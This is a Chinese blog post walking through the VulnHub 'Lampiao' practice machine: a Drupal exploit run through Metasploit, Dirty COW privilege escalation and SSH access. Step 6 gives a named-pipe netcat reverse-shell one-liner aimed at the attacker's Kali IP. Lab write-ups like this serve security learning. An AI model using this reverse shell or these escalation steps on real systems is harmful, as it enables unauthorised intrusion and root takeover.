vulnhub打靶--lampiao

XXX_WXY

于 2023-07-18 21:55:18 发布

阅读量122

点赞数

分类专栏： vulnhub 信息安全文章标签： php web安全信息安全网络安全

本文链接：https://blog.csdn.net/m0_52920608/article/details/131797070

版权

信息安全同时被 2 个专栏收录

35 篇文章 2 订阅

订阅专栏

vulnhub

6 篇文章 0 订阅

订阅专栏

vulnhub–lampiao

vulnhub 搜索lampiao下载即可

1.扫描主机端口，发现1898端口部署web

2.打开robots.txt发现CHANGELOG.txt文件

在这里插入图片描述

3.发现drupal更新日志，drupal这个版本有公开exp。利用msf打下

在这里插入图片描述

4.执行uname -a 或者上传漏洞suggest脚本，可以发现有脏牛提权

5.上传脚本到目标（可以用msf upload命令）

这里40847和40839都可以。建议40839它是添加个root用户，而40847是直接覆盖原先root密码
在这里插入图片描述

6.反弹shell

这里禁用了nc的-e参数

	如果 -e参数被禁用

	mknod /tmp/backpipe p

	/bin/sh 0</tmp/backpipe | nc kali的ip 9999 1>/tmp/backpipe
	kali执行 nc -lvnp 9999

这里只是其中一种方法，也有其他反弹shell方法

7.编译c文件并执行

在这里插入图片描述

8.ssh连接

这里我用的是ssh管理工具（xshell），直接在kali上 ssh username@ip 然后输密码也是一样的
在这里插入图片描述

9.总结

首先是信息搜集，查看到对应drupal版本信息
其次利用drupal漏洞getshell
最后利用脏牛漏洞提权

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

XXX_WXY

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

vulnhub lampiao靶机 Linux脏牛提权

weixin_51441054的博客

04-04

3316

首先我们打开靶机，发现需要登录利用kali作为攻击机，先扫描其ip地址，kali ip为192.168.142.134,因为在同一局域网下，用nmap扫描得到靶机ip为192.168.142.136,访问80端口再进一步扫描端口得到一个1898端口，貌似是主页发现cms信息利用msf进行漏洞利用攻击成功，得到一个普通用户权限上传一个探测Linux提权漏洞的探针发现没有Perl，不能运行，换一个探针...

vulnhub-DarkHole 1-靶场-打靶记录

lcc001114的博客

06-15

659

这里我们登录进去修改密码点change抓包，发现id=2，咱么大胆猜测一下管理员账户的 id=1，那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞（靶场没卵用），后端只校验用户名/邮箱/在数据库重没重复，并没有验证码进行注册限制。接下来用注册好的账号登录，在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量，等执行./toto时会执行id，执行id时就会执行我们的/bin/bash。正常来讲应该是成功了，但这却失败了可能是蚁剑的原因，反弹到kali机上试试。

参与评论您还未登录，请先登录后发表或查看评论

vulnhub靶场之lampiao

向阳-Y.的博客

02-28

4381

目录1.信息收集2.尝试爆破ssh登录【失败】3.尝试访问网站3.1扫描目录【失败】4.网站系统漏洞【get】5.提权阶段 1.信息收集首先查看本机网卡网段并来一波存活主机探查，经过排除，锁定了192.168.86.132为靶机 nmap -sP 192.168.86.0/24 接着再对靶机进行一波端口扫描，扫描后的结果如下 nmap -sN -sV -p 1-65535 192.168.86.132 2.尝试爆破ssh登录【失败】首先使用msfconsole进行ssh登录爆破一波 msfcon

【脏牛漏洞】vulnhub-Lampiao

Mr_atopos的博客

06-07

454

利用CVE-2018-7600、脏牛

vulnhub-lampiao

m0_45155797的博客

04-07

vulnhub lampiao drupal 脏牛提权

Vulnhub之lampiao

qq_45589758的博客

05-15

358

上面得到的Drupal可以通过msf进行搜索，并对其进行利用，这里利用的是一个2018年的漏洞，渗透测试过程中可以多利用几个，注意站内使用的版本是哪一年的，择payload时，要用新的。我发现有的文章是在网站的网页信息中提取疑似可以利用的信息，组成一个字典，使用hydra进行爆破，本人没有尝试，但是这种字典肯定是抽取的关键字越多，越容易爆破出来。在页面存在的其他可点击链接随便点点看看，这里需要注意的是有连个URL是相似的，以node=1和以node=3结尾，这里应该测试node=2或者其他。

打靶练习vulnhub:Insanity-Hosting

03-19

打靶练习vulnhub:Insanity-Hosting

打靶练习vulnhub: my-cmsms

最新发布

04-10

打靶练习vulnhub: my-cmsms

一起打靶-Breach-2-final2.1.xss上线

09-28

"一起打靶-Breach-2-final2.1.xss上线" 知识点1：靶机配置靶机 Breach 2.0 配置了静态 IP（192.168.110.151），用户需要配置主机 only 适配器来访问该子网。知识点2：生产环境模拟该挑战试图展示一个真实世界的...

【vulnhub】-----dc9靶场打靶记录

weixin_54603520的博客

05-11

162

在这里sqlmap为我们发现了一个账户和一个做了md5加密的密码，这里sqlmap已经使用自带的模块帮我们拿到了密码铭文。成功拿到三个数字，然后我们可以使用依次通过22端口访问，或者使用for循环使用当前三个数字对22端口斤西瓜访问。成功拿到了我们需要的参数，这里我们使用linux系统中etc/passwd的查找，由于我们不知道当前目录情况，这里我们尝试使用…我们依次登录当前三个账户，前两个进去做基本的信息收集并没有得到有效信息，在第三个账户中，我们收集到了一个包含密码的txt文件。

[Vulnhub] Lampiao

weixin_63231007的博客

07-03

633

下载链接：Lampião: 1 ~ VulnHub nmap 扫描一下发现靶机ip：192.168.236.134nmap -A -p 1-65535 192.168.236.134扫一下靶机ip，看看开放了哪些服务：访问80，没有信息，试试这个1898发现一个登录框，类似于博客 dirb 扫描一下目录 dirb http://192.168.236.134:1898 访问其中的，发现了是Drupal msf--Drupal漏洞利用 msfconsole 查找一下msf中Drupal可以利用的漏洞

Vulnhub之lampiao渗透测试

Bird&Bird

04-02

1153

目录1、靶场概述2、信息收集1、靶场概述DescriptionBack to the TopWould you like to keep hacking in your own lab?Try this brand new vulnerable machine! "Lampião 1".Get root!Level: Easy链接:[靶场下载地址](https://www.vulnhub.com/entry/lampiao-1,249/)Kali IP 地址： 192.168.29.131靶场IP地址： 1

VulnHub靶场之Lampiao

A_dmin的博客

10-16

1563

VulnHub靶场之Lampiao 最近事情有点多，但是还是要抽出点时间来学习的！！！老样子，Lampiao虚拟机先启动，然后再启动kali！！ Lampiao虚拟机启动如下，不知账户密码，估摸着和上次那个靶机是差不多的！！！..

vulnhub靶机-Lampiao

臭nana的博客

12-18

427

搭好环境之后，找到靶机的ip，我这里是10.22.102.174，nmap扫描端口，nmap -p- 10.22.102.174 发现80端口，访问一下再访问一下1898端口，利用谷歌插件wappalyzer发现这个网站是Drupal7 cms 直接上网百度相关漏洞，发现一大堆，其中发现一个CVE-2018-7600 进入kali，打开终端，输入msfconsole，进...

Vulnhub系列-Lampiao

Yasso的博客

01-06

3025

靶机：192.168.12.133 kali：192.168.12.128 一、信息搜集 nmap -p- -sV 192.168.12.133 访问80端口一串乱码(没找到有用的信息) 访问1898端口 Drupal−CMS\color{red}{Drupal-CMS}Drupal−CMS http://192.168.12.133:1898/?q=node/2 audio.m4a qrc.png wget http://192.168.12.133:1898/audio.m4a wget http:

vulnhub靶场之Lampiao

weixin_43896364的博客

06-27

169

信息搜集端口扫描扫描同网段IP，查找到靶机IP 访问IP地址，页面没有有用的信息继续扫描，发现开放1898端口访问1898端口，得到正常页面，发现该页面使用了国外的开源PHP框架Drupal：在msf中搜索能够利用的EXP，发现2018年的可用：设置目标地址和端口号之后把exp打过去：获得根目录权限：上传脚本并运行，看是否存在SUID或者脏牛提权的可能：搜索到脏牛提权漏洞： ...

vulnhub-靶机Lampiao

qq_43335965的博客

06-13

目标信息：攻击机IP地址:192.1681.10 Lampiao靶机IP地址：192.168.1.12 DC-1靶机IP地址:192.168.1.7 目的：获取靶机root权限和靶机设置的所有flag。知识点：nmap robots.txt drupal7 cms远程代码执行漏洞(CVE-2018-7600) shell交互脏牛提权 Python创建简单的HTTP服务 Lampiao 在18...

VulnHub-Lampiao-Walkthrough渗透学习

qq_34801745的博客

12-27

2390

VulnHub-Lampiao-Walkthrough 靶机地址：https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度：简单靶机发布日期：2018年7月28日靶机描述：Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...

vulnhub--lampiao（脏牛提权）

鲨鱼辣椒的博客

08-03

4810

信息搜集扫描网段确具体IP地址扫描IP地址确定开放端口以及服务浏览器查看网站查看1898端口，发现另一个网站扫描网站

PC-DMIS在几何量测量技术的应用探索

4. **特殊打靶孔测量**：航空发动机的测量技术被详细阐述，展示了解决特殊几何形状测量的策略。 5. **三坐标自动测量**：通过自动测量，奇瑞汽车的质量保证部展示了如何改善测量流程，提高检测速度和精度。 6. **...